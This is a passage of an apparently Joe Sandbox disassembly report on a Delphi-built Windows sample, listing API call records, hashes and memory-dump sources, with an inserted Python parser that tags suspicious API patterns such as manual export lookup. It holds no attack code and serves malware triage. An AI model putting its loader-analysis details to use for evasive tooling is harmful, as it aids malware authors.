• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DB5C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DB5C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DB5CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DB5CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DB5CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DB5CEB
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1599918012-2375825460
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 50c4342d8ddca7047e95a62917f87a5ac0ed4b1371f4808b17fe9d6ac8d44e9a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2331C971E0025CA9EB27DAB4DC66FDE77AE9F04380F4441E1960AE6280D774DE48CF60
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02DB7FF5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1705453755-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ee89df898164a92fad66987575a2ff485a7d558a94dc2a13317c1d7aaf433da5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D411BEB5A00209AFDB45CFA9C8819EFF7F9EFC8700F54C569A505E7354E6719E018BA0
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DBA7E2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a949fb96fe8a2e070b5b0f6b92cd56c9447409fff6f3330bfe8b7ed29fb07ee2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AE09271B0461497D712A5689CA0EEA729DDF58310F0042AAAA06C7386EDA19E804AF4
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32(?,02DDD106,00000000,02DDD11E), ref: 02DBB79A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7e020d7a817db396312b0eb79a2b05727c422c4f1a50a5498bb2b324e1621c8d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e6b6c6af254f94d819656f7fb717fcf9b04f5e0ba3576627e3cedea5f3151874
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e020d7a817db396312b0eb79a2b05727c422c4f1a50a5498bb2b324e1621c8d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1F0F474905701EFD380DF28D85165577E9FB88704F004D29EA99CB780E734DC14DB92
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02DBBE72,00000000,02DBC08B,?,?,00000000,00000000), ref: 02DBA823
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
Similarity
• API ID: LocalTime
• String ID:
• API String ID: 481472006-0
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02DBD29D
  • Part of subcall function 02DBD268: GetProcAddress.KERNEL32(00000000), ref: 02DBD281
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02DC6EDE
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02DC6EEF
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02DC6EFF
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02DC6F0F
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02DC6F1F
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02DC6F2F
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02DC6F3F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 667068680-2233174745
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 32d894b556e14c7ae09efed5d198a3cdca91296fb200d563fd416cf9631598a7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ead805779fbf0bed1488ca1cbbe05c2cc80df95cac92434e67f3439580048abb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32d894b556e14c7ae09efed5d198a3cdca91296fb200d563fd416cf9631598a7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5F0FEE1A8D783ADFA01BB706CA1866275DED54604B202C5968039A7C6E675EC188EA0
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02DB28CE
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-32948583
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 430552654fb4a7558b78cf0125a718bc078da6b145598ef69b7b6475ec9c58b9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e35bd9475ce2e83d96671639618cadd70e56d1e3ff533d883f26bf90f7786ffe
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 430552654fb4a7558b78cf0125a718bc078da6b145598ef69b7b6475ec9c58b9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3A1F532A04294CBDF23AA2CCCA8BD9B6E5EF09350F5441E5DD4A9B381CB758D85CF61
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • The unexpected small block leaks are:, xrefs: 02DB2707
                                                                                                                                                                                                                                                                                                                                  • bytes: , xrefs: 02DB275D
                                                                                                                                                                                                                                                                                                                                  • , xrefs: 02DB2814
                                                                                                                                                                                                                                                                                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02DB2849
                                                                                                                                                                                                                                                                                                                                  • An unexpected memory leak has occurred. , xrefs: 02DB2690
                                                                                                                                                                                                                                                                                                                                  • 7, xrefs: 02DB26A1
                                                                                                                                                                                                                                                                                                                                  • Unexpected Memory Leak, xrefs: 02DB28C0
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2723507874
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 286ed1eaccedd10215fa847134e9a235d99b98ef959f69cd6bb27e11c7867cec
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 02cb78ceb8844b0eeb910fea3f71a27abe4efd127da51255fc4ac8957415bfb3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 286ed1eaccedd10215fa847134e9a235d99b98ef959f69cd6bb27e11c7867cec
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F871C331A04298CFDF22AA2CCC98BD9B6E5EF09350F5041E5D94A9B381CB758DC5CF61
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,02DBC08B,?,?,00000000,00000000), ref: 02DBBDF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DBA7E2
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
• Opcode ID: 54011d80752e1259b2a7c925bafb4058709f6ff821f85004fe51f99e7539efef
• Instruction ID: 12f607d26218c1ee5c3b943e43692ca6ea3b70e2e24a0aafe6794133a6e9af30
• Opcode Fuzzy Hash: 54011d80752e1259b2a7c925bafb4058709f6ff821f85004fe51f99e7539efef
• Instruction Fuzzy Hash: 9C610C34A54148EBDB02EBA4D870ADF77BAEF88300F609835A103AB745DA39DD458B65
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DCB000
• GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02DCB017
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DCB0AB
• IsBadReadPtr.KERNEL32(?,00000002), ref: 02DCB0B7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 02DCB0CB
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: Read$HandleModule
• String ID: KernelBase$LoadLibraryExA
• API String ID: 2226866862-113032527
• Opcode ID: 2a49ecce144b2ca1259c95c7e895055dc760c92ad0cad3b93ee408fca9d5e67e
• Instruction ID: fd96817db7406804eae9ad9f7b554c8be4637f139b7e17a11b3be3887f304b20
• Opcode Fuzzy Hash: 2a49ecce144b2ca1259c95c7e895055dc760c92ad0cad3b93ee408fca9d5e67e
• Instruction Fuzzy Hash: 42316171A40606BBDB20DB69CC86F5AB7A8FF06368F204159EA54E73C0D730ED40DBA0
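The "APIs" listings in these function records share one line format: `API.MODULE(args), ref: address`, with `Part of subcall function X:` prefixed when the call sits in a callee, and the `ref:` values are addresses inside the dumped module whose base is the `Offset: 02DB0000` of the Memory Dump Source block. As an added example, not Joe Sandbox's own code, the Python below parses those lines back into structured calls, maps each `ref:` to an RVA in the dumped PE, and applies triage heuristics of the editor's own devising (the tag names and the rules are assumptions, not Joe Sandbox signatures) to lines copied from three records in this report.

```python
"""Parse the per-function "APIs" entries of a Joe Sandbox disassembly report
and tag API combinations worth a closer look.

Added by the editor as an example; not Joe Sandbox code. The tag names and
triage rules are the editor's heuristics, not Joe Sandbox signatures."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# "Offset: 02DB0000" from the Memory Dump Source block: base of the dumped PE.
DUMP_BASE = 0x02DB0000

# Constructed samples: API lines copied verbatim (a subset, for the second
# record) from the 02DCB000, 02DB4395 and 02DBAEFB records of this report.
RECORD_LOOKUP = """\
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DCB000
• GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02DCB017
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DCB0AB
• IsBadReadPtr.KERNEL32(?,00000002), ref: 02DCB0B7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 02DCB0CB
"""
RECORD_RTERR = """\
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DB4423,?,?,02E367C8,?,?,02DDE7A8,02DB65B1,02DDD30D), ref: 02DB4395
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DB4423,?,?,02E367C8,?,?,02DDE7A8,02DB65B1,02DDD30D), ref: 02DB439B
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02DB43D4
"""
RECORD_SUBCALL = """\
  • Part of subcall function 02DBAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DBAD59
  • Part of subcall function 02DBAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DBAE2E
• CharToOemA.USER32(?,?), ref: 02DBAEFB
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02DBAF18
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DBAF1E
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 02DBAF71
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ARG = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                       # address inside the dumped module
    subcall: Optional[int] = None  # set when the call lives in a callee


def parse_calls(record: str) -> list[ApiCall]:
    """Turn one record's "APIs" lines into ApiCall objects; skip other lines."""
    calls = []
    for line in record.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        args = m["args"].split(",") if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def rva(ref: int, base: int = DUMP_BASE) -> int:
    """Map a "ref:" address to an RVA in the dumped PE (offset from its base)."""
    return ref - base


def string_args(calls: list[ApiCall]) -> set[str]:
    """Literal string arguments: neither '?' nor an 8-digit hex value."""
    return {a for c in calls for a in c.args if a != "?" and not HEX_ARG.fullmatch(a)}


def classify(calls: list[ApiCall]) -> list[str]:
    """Editor's triage heuristics over one record; API names from direct calls only."""
    direct = {c.api for c in calls if c.subcall is None}
    strings = string_args(calls)
    tags = []
    # IsBadReadPtr probing next to a module name and an export name passed as
    # strings: consistent with resolving an export by hand rather than via an import.
    if {"IsBadReadPtr", "GetModuleHandleW"} <= direct and "LoadLibraryExA" in strings:
        tags.append("manual-export-lookup")
    # Write to a standard handle, then MessageBoxA: a console-or-GUI error path.
    if {"GetStdHandle", "WriteFile", "MessageBoxA"} <= direct:
        tags.append("stdhandle-messagebox-error-path")
    if any(s.startswith("Runtime error at") for s in strings):
        tags.append("runtime-error-message")
    return tags


if __name__ == "__main__":
    for name, rec in (("02DCB000", RECORD_LOOKUP), ("02DB4395", RECORD_RTERR),
                      ("02DBAEFB", RECORD_SUBCALL)):
        calls = parse_calls(rec)
        print(name, [f"{c.api}@{rva(c.ref):05X}" for c in calls], classify(calls))
```

Two caveats when reading these records the same way. The `000000F5` and `000000F4` first arguments to GetStdHandle are the low byte of STD_OUTPUT_HANDLE (-11) and STD_ERROR_HANDLE (-12) as the sandbox rendered them, so the 02DB4395 and 02DBAEFB records are the runtime's error reporter (the "Runtime error at" text is the Delphi RTL's message format) rather than anything the sample does on its own; that is why the heuristic pairs the console write with MessageBoxA instead of flagging either call alone. Conversely, the IsBadReadPtr/GetModuleHandleW record is only a lead: the tag says the pattern is consistent with a hand-rolled export lookup, and confirming that still needs the disassembly at RVA 0x1B000 of the dumped module.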
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DB4423,?,?,02E367C8,?,?,02DDE7A8,02DB65B1,02DDD30D), ref: 02DB4395
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DB4423,?,?,02E367C8,?,?,02DDE7A8,02DB65B1,02DDD30D), ref: 02DB439B
• GetStdHandle.KERNEL32(000000F5,02DB43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DB4423,?,?,02E367C8), ref: 02DB43B0
• WriteFile.KERNEL32(00000000,000000F5,02DB43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DB4423,?,?), ref: 02DB43B6
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02DB43D4
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
